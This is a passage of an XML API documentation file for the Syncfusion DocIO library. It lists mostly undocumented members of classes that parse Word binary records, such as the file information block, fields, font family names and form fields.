        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPgdEdn">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the endnote text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPgdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcBkdEdn">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the endnote text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbBkdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfIntlFld">
            <summary>
            offset in table stream of the STTBF containing field keywords. This is only used in a small number of the international versions of word. This field is no longer written to the file for nFib >= 167.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfIntlFld">
            <summary>
            Always 0 for nFib >= 167.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcRouteSlip">
            <summary>
            offset in table stream of a mailer routing slip.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbRouteSlip">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbSavedBy">
            <summary>
            offset in table stream of STTBF recording the names of the users who have saved this document alternating with the save locations.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbSavedBy">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbFnm">
            <summary>
            offset in table stream of STTBF recording filenames of documents which are referenced by this document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbFnm">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfLst">
            <summary>
            Offset in the table stream of list format information.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfLst">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlfLfo">
            <summary>
            offset in the table stream of list format override information.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlfLfo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcftxbxBkd">
            <summary>
            offset in the table stream of the textbox break table (a PLCF of BKDs) for the main document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcftxbxBkd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcftxbxHdrBkd">
            <summary>
            offset in the table stream of the textbox break table (a PLCF of BKDs) for the header subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcftxbxHdrBkd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcDocUndo">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbDocUndo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcRgbuse">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbRgbuse">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcUsp">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbUsp">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcUskf">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbUskf">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcupcRgbuse">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcupcRgbuse">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcupcUsp">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcupcUsp">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbGlsyStyle">
            <summary>
            offset in table stream of string table of style names for glossary entries
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbGlsyStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlgosl">
            <summary>
            offset in table stream of undocumented grammar options PL
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlgosl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcocx">
            <summary>
            offset in table stream of undocumented ocx data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcocx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfbteLvc">
            <summary>
            offset in table stream of character property bin table.PLC. FCs in PLC are file offsets. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfbteLvc">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.dwLowDateTime">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.dwHighDateTime">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcflvc">
            <summary>
            offset in table stream of LVC PLCF
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcflvc">
            <summary>
            size of LVC PLCF, ==0 for non-complex files
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcasumy">
            <summary>
            offset in table stream of autosummary ASUMY PLCF.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcasumy">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfgram">
            <summary>
            offset in table stream of PLCF (of SPLS structures) which records grammar check state
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfgram">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbListNames">
            <summary>
            offset in table stream of list names string table
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbListNames">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfUssr">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfUssr">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor">
            <summary>
            Summary description for FieldDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.m_ch">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.m_reserved">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.m_fieldType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.#ctor(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Parse(System.Int16)">
            <summary>
            
            </summary>
            <param name="sh"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Save">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Clone">
            <summary>
            Clone field
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Read(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Write(System.IO.Stream)">
            <summary>
            Write FieldDescriptor to stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.HasSeparator">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.IsResultDirty">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.IsResultEdited">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.IsNested">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.Type">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor.FieldBoundary">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields">
            <summary>
            Summary description for Fields.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.DEF_FLD_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.m_reader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.#ctor(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.AddField(Syncfusion.DocIO.ReaderWriter.WordSubdocument,Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor,System.Int32)">
            <summary>
             
            </summary>
            <param name="docType"></param>
            <param name="fld"></param>
            <param name="pos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.GetFieldsForSubDoc(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Gets fields for subdocument.
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.Write(System.IO.Stream,System.UInt32,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="endPosition">The end position.</param>
            <param name="subDocument">The sub document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.FindFld(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32)">
            <summary>
            
            </summary>
            <param name="docType"></param>
            <param name="pos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.ReadFieldDescriptor(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="pos"></param>
            <param name="posNext"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.ReadFieldsForSubDoc(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.UInt32,System.UInt32)">
            <summary>
            
            </summary>
            <param name="docType"></param>
            <param name="pos"></param>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.WriteFieldsForSubDocument(Syncfusion.DocIO.DLS.DocIOSortedList{System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor},System.IO.Stream,System.UInt32)">
            <summary>
            Writes the fields for sub document.
            </summary>
            <param name="stList">The st list.</param>
            <param name="stream">The stream.</param>
            <param name="endPosition">The end position.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.MainFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.HFFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.FtnFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.AtnFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.EdnFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.TxbxFields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Fields.HdrTxbxFields">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner">
            <summary>
            Summary description for FieldTypeDefiner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.GetFieldType(System.String)">
            <summary>
            
            </summary>
            <param name="fieldCode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.GetFieldCode(Syncfusion.DocIO.FieldType)">
            <summary>
            
            </summary>
            <param name="fieldType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.IsFormField(Syncfusion.DocIO.FieldType)">
            <summary>
            
            </summary>
            <param name="fld"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.InitStrTypeHash">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.InitTypeStrHash">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.StrTypeTable">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldTypeDefiner.TypeStrTable">
            <summary>
            Gets the type STR table.
            </summary>
            <value>The type STR table.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord">
            <summary>
            <para>Font family name record.
            Note that just as for a pascal-style string, the first byte in the 
            FFN records the total number of bytes not counting the count byte 
            itself.</para>
            <para>The names of the fonts correspond to the ftc codes in the 
            CHP structure. For example, the first font name listed corresponds 
            is the name for ftc = 0</para>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.DEF_MAX_LENGTH">
            <summary>
            Maximal length of string that represent font names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.DEF_PITCHREQUEST_MASK">
            <summary>
            Bits masks and offsets for FFNBaseStructure.Options property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.m_ffnBase">
            <summary>
            FFN base structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.m_strFontName">
            <summary>
            The font name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.m_strAltFontName">
            <summary>
            The alternative font name.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Exstract record data from specified byte array.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.Save(System.Byte[],System.Int32)">
            <summary>
            Save record data in array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.UnderlyingStructure">
            <summary>
            Underlying structure ( used in BaseWordRecord for fast copy data
            to special structure )
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.TotalLengthM1">
            <summary>
            Length of ffn minus 1.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.Length">
            <summary>
            Length of record.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.PitchRequest">
            <summary>
            Gets or sets pitch request.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.IsSubsetted">
            <summary>
            Check whether the subsetted attribute is present
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.TrueType">
            <summary>
            Gets or sets TrueType flag for font.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.FontFamilyID">
            <summary>
             Gets or sets font family id.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.Weight">
            <summary>
            Gets or sets base weight of font.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigUsb0">
            <summary>
            Get/set font signature of Unicode Subset Bitfields 0
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigUsb1">
            <summary>
             Get/set font signature of Unicode Subset Bitfields 1
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigUsb2">
            <summary>
             Get/set font signature of Unicode Subset Bitfields 2
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigUsb3">
            <summary>
             Get/set font signature of Unicode Subset Bitfields 3
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigCsb0">
            <summary>
             Get/set font signature of Code Page Bitfields 0
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.SigCsb1">
            <summary>
            Get/set font signature of Code Page Bitfields 1
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.CharacterSetId">
            <summary>
            Gets or sets character set identifier.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.FontName">
            <summary>
            Gets or sets font name.
            Summary font name and alternate font name length can not be large 65 bytes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.AlternativeFontName">
            <summary>
            Gets/Sets alternative font name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameRecord.EmbedFonts">
            <summary>
            Gets/Sets Embed fonts stream (.odttf files)
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable">
            <summary>
            Summary description for FontFamilyNameTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.m_extendedFlag">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.m_noStrings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.m_extraDataLen">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.m_ffnRecords">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.RecordsCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FontFamilyNameStringTable.FontFamilyNameRecords">
            <summary>
            Array of FontFamilyRecord objects.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField">
            <summary>
            Summary description for FormField.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DEF_VALUE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.m_fieldType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.#ctor(Syncfusion.DocIO.FieldType)">
            <summary>
            
            </summary>
            <param name="fieldType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.#ctor(Syncfusion.DocIO.FieldType,System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="fieldType"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.ReadUnicodeString(System.IO.BinaryReader,System.Boolean)">
            <summary>
            
            </summary>
            <param name="binaryReader"></param>
            <param name="readZero"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.ReadString(System.IO.BinaryReader,System.Boolean)">
            <summary>
            
            </summary>
            <param name="binaryReader"></param>
            <param name="readZero"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.WriteString(System.String,System.IO.BinaryWriter,System.Boolean)">
            <summary>
            
            </summary>
            <param name="text"></param>
            <param name="writer"></param>
            <param name="writeSeparator"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.FormFieldType">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.FieldType">
            <summary>
            Gets field type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Params">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.MaxLength">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.CheckBoxSize">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Title">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Checked">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DefaultCheckBoxValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DefaultDropDownValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DefaultTextInputValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Format">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Value">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Help">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.Tooltip">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.MacroOnStart">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.MacroOnEnd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DropDownIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DropDownItems">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.DropDownValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.IsCalculateOnExit">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.IsCheckBoxExplicitSize">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.IsDisabled">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField.TextFormFieldType">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor">
            <summary>
            Summary description for LineSpacingDescriptor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.#ctor(System.Byte[])">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.Parse(System.Byte[])">
            <summary>
            
            </summary>
